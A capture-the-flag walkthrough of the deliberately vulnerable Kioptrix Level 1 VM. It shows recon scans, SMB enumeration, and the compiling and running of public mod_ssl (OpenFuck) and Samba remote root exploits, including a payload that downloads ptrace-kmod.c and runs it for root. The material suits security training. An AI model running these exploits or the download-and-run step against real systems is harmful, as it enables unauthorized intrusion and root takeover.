VulnHub – Kioptrix: Level 1 (#1) walkthrough

Kioptrix: Level 1 (#1) description and download link:
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

First, use nmap, netdiscover or arp-scan to find the hosts on the same subnet. Any one of the three will do:

nmap -sP 192.168.112.0/24
netdiscover -r 192.168.112.0/24
arp-scan 192.168.112.0/24

The results of the scans are below (nmap first, then netdiscover, then arp-scan):

root@hackercat:~# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 03:51 EST
Nmap scan report for 192.168.112.1
Host is up (0.00098s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00063s latency).
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 14 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 840
____________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname 
 ---------------------------------------------------
 192.168.112.1   00:50:56:c0:00:08     11     660  VMware, Inc.
 192.168.112.2   00:50:56:f7:2e:d5      1      60  VMware, Inc.
 192.168.112.252 00:0c:29:e1:8c:82      1      60  VMware, Inc.
 192.168.112.254 00:50:56:e0:3d:e8      1      60  VMware, Inc.
root@hackercat:~# arp-scan 192.168.112.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:87:73:e8, IPv4: 192.168.112.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.112.2	00:50:56:f7:2e:d5	VMware, Inc.
192.168.112.1	00:50:56:c0:00:08	VMware, Inc.
192.168.112.252	00:0c:29:e1:8c:82	VMware, Inc.
192.168.112.254	00:50:56:e0:3d:e8	VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.478 seconds (103.31 hosts/sec). 4 responded

So the target IP is 192.168.112.252 (192.168.112.128 is our own machine, as the arp-scan interface line shows).
Next we need to run a port scan.

The port scan results are below. Open ports found:
22 ssh
80 http
139 samba
443 https
111, 1024 rpc

The default scripts (-sC) also pulled back NetBIOS information, which may be a way in.

root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_allPortTCP.txt 
# Nmap 7.80 scan initiated Sun Feb  2 03:55:02 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0041s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-02T09:58:05+00:00; +1h01m48s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:E1:8C:82 (VMware)

Host script results:
|_clock-skew: 1h01m47s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|_  MYGROUP<1e>          Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb  2 03:57:17 2020 -- 1 IP address (1 host up) scanned in 134.75 seconds
root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_UDP.txt 
# Nmap 7.80 scan initiated Sun Feb  2 03:56:02 2020 as: nmap -v -sU -Pn -oN 192.168.112.252_UDP.txt 192.168.112.252
Increasing send delay for 192.168.112.252 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 192.168.112.252
Host is up (0.00087s latency).
Not shown: 996 closed ports
PORT     STATE         SERVICE
111/udp  open          rpcbind
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
1024/udp open|filtered unknown
MAC Address: 00:0C:29:E1:8C:82 (VMware)

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Feb  2 04:14:08 2020 -- 1 IP address (1 host up) scanned in 1086.03 seconds

Check the web
Port 80 (HTTP) and port 443 (HTTPS) serve the same page.

Use dirb to do a quick brute-force of paths:

dirb http://192.168.112.252 -o dirb_http.txt

Let's see if there is anything interesting in NetBIOS / SMB:

nmblookup -A 192.168.112.252
nbtscan 192.168.112.252
smbmap -H 192.168.112.252
enum4linux -a 192.168.112.252

The results are below.
nbtscan is actually better suited to reconnaissance of a whole subnet, e.g. nbtscan 192.168.112.0/24.
It looks like some potentially useful information can be found here, so we can try connecting with rpcclient.
If a null session (empty username and password) were accepted, the enum4linux scan would already have shown it in its session check.

root@hackercat:~/vulnhub/kioptrix-level-1# nmblookup -A 192.168.112.252
Looking up status of 192.168.112.252
	KIOPTRIX        <00> -         B <ACTIVE> 
	KIOPTRIX        <03> -         B <ACTIVE> 
	KIOPTRIX        <20> -         B <ACTIVE> 
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> 
	MYGROUP         <00> - <GROUP> B <ACTIVE> 
	MYGROUP         <1d> -         B <ACTIVE> 
	MYGROUP         <1e> - <GROUP> B <ACTIVE> 

	MAC Address = 00-00-00-00-00-00
root@hackercat:~/vulnhub/kioptrix-level-1# nbtscan 192.168.112.252
Doing NBT name scan for addresses from 192.168.112.252

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.112.252  KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00
root@hackercat:~/vulnhub/kioptrix-level-1# smbmap -H 192.168.112.252
[+] Finding open SMB ports....
root@hackercat:~/vulnhub/kioptrix-level-1# enum4linux -a 192.168.112.252
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb  2 04:09:03 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.112.252
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.112.252    |
 ======================================================= 
[+] Got domain/workgroup name: MYGROUP

 =============================================== 
|    Nbtstat Information for 192.168.112.252    |
 =============================================== 
Looking up status of 192.168.112.252
	KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	MYGROUP         <1d> -         B <ACTIVE>  Master Browser
	MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.112.252    |
 ======================================== 
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

rpcclient -U "" 192.168.112.252
or
rpcclient -U="root" 192.168.112.252

Use searchsploit to look for exploits for the services we found:

searchsploit openssh
searchsploit apache 1.3
searchsploit openssl

The apache mod_ssl < 2.8.7 openssl PoC looks like the most promising one.

There are two usable ones: 764.c and 47080.c.

I started with 764.c, but something felt off, so I decided to switch to 47080.c.

Compiling it hit an error, so I opened 47080.c to have a look.

The header comment mentions that a library needs to be installed first:

apt install libssl-dev

Then compile it with the syntax it gives:

gcc -o OpenFuck 47080.c -lcrypto

When that finishes there is a new file called OpenFuck. Run it and see what it shows.

It helpfully reminds you of the usage.

./OpenFuck 192.168.112.252 443 -c 45

Turns out I had misread the usage XD. It is actually:

Usage: ./OpenFuck target box [port] [-c N]

target is not where the target IP goes: target takes the entry from the supported-offset list printed below the usage that matches the target's version, and box is where the IP goes.

From the port scan earlier we already know the version is
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Checking it against the list, it should be... hmm, there are quite a few candidates XD
I picked 0x5e at random first and it failed.

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x5f 192.168.112.252 443 -c 45

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
Good Bye!

Using grep on the list, I found the entries for 1.3.20:

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck | grep 1.3.20
	0x02 - Cobalt Sun 6.0 (apache-1.3.20)
	0x27 - FreeBSD (apache-1.3.20)
	0x28 - FreeBSD (apache-1.3.20)
	0x29 - FreeBSD (apache-1.3.20+2.8.4)
	0x2a - FreeBSD (apache-1.3.20_1)
	0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
	0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
	0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
	0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
	0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
	0x7e - Slackware Linux 8.0 (apache-1.3.20)
	0x86 - SuSE Linux 7.3 (apache-1.3.20)

So it comes down to 0x6a and 0x6b.
It's decided, it's you two.
0x6a failed, but 0x6b succeeded!

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x6b 192.168.112.252 443 -c 45

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--06:09:30--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

06:09:31 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

gcc: file path prefix `/usr/bin' never used
[+] Attached to 6241
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root

This is just one of the ways to get root.

Let's try another way.
Again using searchsploit, this time looking for a Samba remote PoC for Linux.
Because of case sensitivity, I grep for "inux" and "emote":

searchsploit samba | grep inux | grep emote

I decided to try this one:

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

As before, copy the PoC into the working directory, compile it and run it.
It turns out it nicely explains how to use it, too.

root@hackercat:~/vulnhub/kioptrix-level-1# cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/vulnhub/kioptrix-level-1/
root@hackercat:~/vulnhub/kioptrix-level-1# ls
10.c  192.168.112.252_allPortTCP.txt  192.168.112.252_UDP.txt  19975.pl  47080.c  764.c  dirb_http.txt  OpenFuck
root@hackercat:~/vulnhub/kioptrix-level-1# gcc 10.c -o 10
root@hackercat:~/vulnhub/kioptrix-level-1# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

A quick, almost random try and it worked XD

root@hackercat:~/vulnhub/kioptrix-level-1# ./10 -v -b 0 192.168.112.252
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

I only learned later that there is a flag on this box too.
Use find to search for different keywords (the pattern is quoted so the shell does not expand it locally):

find / -iname "*flag*" 2>&1 | grep -v "Permission denied"

Searching for "flag" turned up a few things that looked like it,
but cat showed only junk.

In the end I found it by searching for the keyword "root",
under the mail directory:

cat /var/spool/mail/root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
	by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
	for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

From root  Sun Feb  2 04:45:16 2020
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
	by kioptrix.level1 (8.11.6/8.11.6) id 0129jG501136
	for root; Sun, 2 Feb 2020 04:45:16 -0500
Date: Sun, 2 Feb 2020 04:45:16 -0500
From: root <root@kioptrix.level1>
Message-Id: <202002020945.0129jG501136@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1
